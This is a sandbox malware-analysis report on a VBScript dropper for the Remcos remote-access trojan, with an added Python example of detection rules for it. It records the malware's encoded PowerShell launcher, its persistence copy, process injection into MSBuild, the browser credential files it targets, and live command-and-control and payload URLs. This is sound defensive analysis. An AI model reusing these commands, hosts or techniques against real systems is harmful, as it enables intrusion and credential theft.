Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_0043A65D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00433B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00433CD7 SetUnhandledExceptionFilter, 15_2_00433CD7

                        HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_2020.amsi.csv, type: OTHER (identical entry repeated)
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2020, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D65008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 15_2_00410F36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00418754 mouse_event, 15_2_00418754
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($hamminesses));invoke-expression $stickhandled
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($hamminesses));invoke-expression $stickhandled
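The process tree in the lines above (wscript.exe starting powershell.exe with a FromBase64String plus Invoke-Expression one-liner, powershell.exe starting cmd.exe to copy *.vbs into C:\ProgramData\classers.vbs, and powershell.exe starting MSBuild.exe with no project file before writing an MZ image into it at base 400000) is the detection surface behind the Sigma hits listed in the overview, and the same chain appears in the Persistence and Installation Behavior section as the classers.vbs file creation. The following Python is an added example, not part of the report or of any Sigma rule: it runs three rules over constructed process-creation events shaped like Sysmon Event ID 1 (the field names ParentImage, Image, CommandLine, ProcessId and ParentProcessId are an assumption about the telemetry; the command lines are those recorded in the report, the powershell PID 2020 is the one the report names, and the other PIDs are made up) and reconstructs the ancestry of each hit. A developer-driven MSBuild launch is included as a control that must not fire.

```python
"""Added example: triage rules for the wscript -> powershell -> {cmd, MSBuild}
chain over process-creation events (constructed, Sysmon Event ID 1 shape)."""
import re

# Constructed events. Command lines follow the report; PID 2020 is the
# powershell PID from the report, the remaining PIDs are invented.
EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "Aktarma,pdf.vbs"'},
    {"ProcessId": 2020, "ParentProcessId": 100,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '
                    r"'<base64>';$stickhandled = [System.Text.Encoding]::UTF8.GetString("
                    r"[System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled"},
    {"ProcessId": 3000, "ParentProcessId": 2020,
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"'},
    {"ProcessId": 4000, "ParentProcessId": 2020,
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'},
    # Benign control (constructed): a build started from Visual Studio.
    {"ProcessId": 5000, "ParentProcessId": 50,
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r'MSBuild.exe /t:Build "C:\src\App\App.csproj"'},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
BUILD_PARENTS = ("devenv.exe", "msbuild.exe", "dotnet.exe")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_encoded_powershell_from_script_host(ev):
    """Script host spawning powershell that decodes base64 and evaluates it."""
    cl = ev["CommandLine"].lower()
    return (basename(ev["ParentImage"]) in SCRIPT_HOSTS
            and basename(ev["Image"]) == "powershell.exe"
            and "frombase64string" in cl
            and ("invoke-expression" in cl or re.search(r"\biex\b", cl) is not None))


def rule_msbuild_without_project(ev):
    """MSBuild.exe launched with no project/solution by something that is not a build tool."""
    if basename(ev["Image"]) != "msbuild.exe":
        return False
    if basename(ev["ParentImage"]) in BUILD_PARENTS:
        return False
    return re.search(r"\.(sln|csproj|vbproj|proj|targets)\b", ev["CommandLine"], re.I) is None


def rule_vbs_copied_to_programdata(ev):
    """cmd.exe copying a .vbs into C:\\ProgramData (the classers.vbs drop)."""
    cl = ev["CommandLine"].lower()
    return (basename(ev["Image"]) == "cmd.exe"
            and "copy" in cl and ".vbs" in cl and "c:\\programdata\\" in cl)


RULES = {
    "encoded_powershell_from_script_host": rule_encoded_powershell_from_script_host,
    "msbuild_without_project": rule_msbuild_without_project,
    "vbs_copied_to_programdata": rule_vbs_copied_to_programdata,
}


def triage(events):
    """Return (rule name, ProcessId) for every event that matches a rule."""
    return [(name, ev["ProcessId"]) for ev in events
            for name, fn in RULES.items() if fn(ev)]


def ancestry(events, pid):
    """Walk ParentProcessId links and return image names from the oldest known ancestor down."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return list(reversed(chain))


if __name__ == "__main__":
    for name, pid in triage(EVENTS):
        print(name, pid, " -> ".join(ancestry(EVENTS, pid)))
```

The rule for MSBuild.exe is deliberately strict about the parent rather than the command line: the hollowed instance in this report carries no arguments at all, so anything that filters on suspicious arguments would miss it, while a parent that is a script interpreter or an Office process combined with the absence of a project file is rare in legitimate builds.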
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager'
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerG
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerst
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerd&
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager\Intern
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager{&
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerEM dQ#
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager^&
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerU&
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, logs.dat.15.dr | Binary or memory string: [Program Manager]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00433E0A cpuid 15_2_00433E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoA, 15_2_0040E679
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW, 15_2_004470AE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,15_2_004510BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004511E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,15_2_004512EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_004513B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,15_2_00447597
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00450A7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,15_2_00450CF7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,15_2_00450D42
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,15_2_00450DDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00450E6A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00404915 GetLocalTime,CreateEventA,CreateThread,15_2_00404915
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A7A2 GetComputerNameExW,GetUserNameW,15_2_0041A7A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_0044800F
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 15_2_0040B21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \key3.db, 15_2_0040B335

Remote Access Functionality

Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: cmd.exe, 15_2_00405042
MITRE ATT&CK Matrix (techniques listed per tactic, in the order of the report's rows; the numbers in parentheses are the report's numeric badges for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Scripting (331); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (1); Exploitation for Client Execution (1); Command and Scripting Interpreter (2); Service Execution (2); PowerShell (2); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scripting (331); DLL Side-Loading (1); Windows Service (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (222); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (11); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (222); HTML Smuggling; Dynamic API Resolution
Credential Access: OS Credential Dumping (1); Input Capture (211); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (43); Security Software Discovery (31); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (11); Input Capture (211); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Web Service (1); Ingress Tool Transfer (12); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1571703 | Sample: Aktarma,pdf.vbs | Start date: 09/12/2024 | Architecture: WINDOWS | Score: 100

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
Top-level network: paste.ee (Connects to a pastebin service (likely for C&C)); rem.pushswroller.eu; 10 other IPs or domains

Process tree:
- wscript.exe
    signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
    - powershell.exe
        network: cloudinary.map.fastly.net 151.101.1.137, ports 443, 49714, FASTLYUS, United States; paste.ee 172.67.187.200, ports 443, 49772, CLOUDFLARENETUS, United States
        signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
        - MSBuild.exe
            signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 3 other signatures
        - MSBuild.exe
            network: rem.pushswroller.eu 45.80.158.30, ports 23101, 49783, UK2NET-ASGB, Netherlands; geoplugin.net 178.237.33.50, ports 49790, 80, ATOM86-ASATOM86NL, Netherlands
            dropped: C:\ProgramData\remcos\logs.dat (data)
            signatures: Installs a global keyboard hook
        - cmd.exe
            dropped: C:\ProgramData\classers.vbs (ASCII)
            signatures: Command shell drops VBS files
            - conhost.exe
        - conhost.exe
- svchost.exe
    network: 127.0.0.1 (unknown)
- wscript.exe

Antivirus detection (sample):
Source | Detection | Scanner | Label | Link
Aktarma,pdf.vbs | 5% | ReversingLabs | Win32.Trojan.Generic |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus detection (URLs / domains):
Source | Detection | Scanner | Label | Link
firewarzone.ydns.eu | 0% | Avira URL Cloud | safe |
rem.pushswroller.eu | 100% | Avira URL Cloud | malware |
sun.drillmmcsnk.eu | 0% | Avira URL Cloud | safe |
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
paste.ee | 172.67.187.200 | true | false | | high
rem.pushswroller.eu | 45.80.158.30 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | high
cloudinary.map.fastly.net | 151.101.1.137 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
ax-0001.ax-msedge.net | 150.171.27.10 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
res.cloudinary.com | unknown | unknown | false | | high
tse1.mm.bing.net | unknown | unknown | false | | high
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
sun.drillmmcsnk.eu | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | | high
firewarzone.ydns.eu | true | Avira URL Cloud: safe | unknown
rem.pushswroller.eu | true | Avira URL Cloud: malware | unknown
https://paste.ee/r/TZC1n/0 | false | | high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg | false | | high
URLs from memory and binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp-V) | MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com; | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000012.00000003.2503873978.000002DC70B20000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr | false | | high
http://crl.ver) | svchost.exe, 00000012.00000002.3420667451.000002DC70C00000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://analytics.paste.ee | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpSystem32 | MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpVT | MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod1C: | qmgr.db.18.dr | false | | high
https://res.cloudinary.com | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | MSBuild.exe, 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://analytics.paste.ee; | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpal | MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp(V | MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdnjs.cloudflare.com | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2437373901.000001E7B1851000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdnjs.cloudflare.com; | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp%h | MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2437373901.000001E7B1851000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://secure.gravatar.com | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://themes.googleusercontent.com | powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.187.200 | paste.ee | United States | 13335 | CLOUDFLARENETUS | false
45.80.158.30 | rem.pushswroller.eu | Netherlands | 13213 | UK2NET-ASGB | true
151.101.1.137 | cloudinary.map.fastly.net | United States | 54113 | FASTLYUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                                                                                  IP
                                                                                                  127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571703
